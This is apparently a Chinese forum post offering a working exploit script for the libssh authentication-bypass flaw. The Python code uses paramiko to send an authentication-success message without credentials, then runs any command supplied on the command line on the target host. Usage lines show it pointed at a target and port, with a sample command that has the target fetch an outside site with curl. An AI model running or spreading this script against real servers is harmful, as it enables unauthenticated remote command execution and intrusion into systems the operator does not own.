|
|
漏洞利用
脚本使用方法:
[pre]
python vulnspy_libssh.py target.com 端口 '命令'
[/pre]
测试脚本:
[pre]
#!/usr/bin/env python
import paramiko
import socket
import argparse
import logging
import sys
import time
import datetime
def BypasslibSSHwithoutcredentials(hostname, port, cmd):
sock = socket.socket()
try:
#logging.basicConfig(stream=sys.stderr, level=logging.DEBUG)
sock.connect((str(hostname), int(port)))
message = paramiko.message.Message()
transport = paramiko.transport.Transport(sock)
transport.start_client()
message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
transport._send_message(message)
# ref:http://joelinoff.com/blog/?p=905
session = transport.open_session()
session.exec_command(cmd)
data = ''
maxseconds = 5
start = datetime.datetime.now()
start_secs = time.mktime(start.timetuple())
while True:
if session.recv_ready():
data = data+session.recv(2048)
if session.exit_status_ready():
break
now = datetime.datetime.now()
now_secs = time.mktime(now.timetuple())
et_secs = now_secs - start_secs
if et_secs > maxseconds:
data = data+'\ntimeout'
break
print data
return 0
except paramiko.SSHException as e:
print("TCPForwarding disabled on remote/local server can't connect. Not Vulnerable")
return 1
except socket.error:
print("Unable to connect.")
return 1
def main():
try:
hostname = sys.argv[1]
port = sys.argv[2]
cmd = sys.argv[3]
except:
print("Usage: python vulnspy_libssh.py target.vsplate.me 2222 'curl www.vulnspy.com'")
exit(1)
BypasslibSSHwithoutcredentials(hostname, port, cmd)
if __name__ == '__main__':
exit(main())
[/pre] |
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有账号?注册
×
|
|
有志者,事竟成,破釜沉舟,百二秦关终属楚. 苦心人,天不负, 卧薪尝胆 ,三千越甲可吞吴
|
发表于 2019-1-14 00:30:26
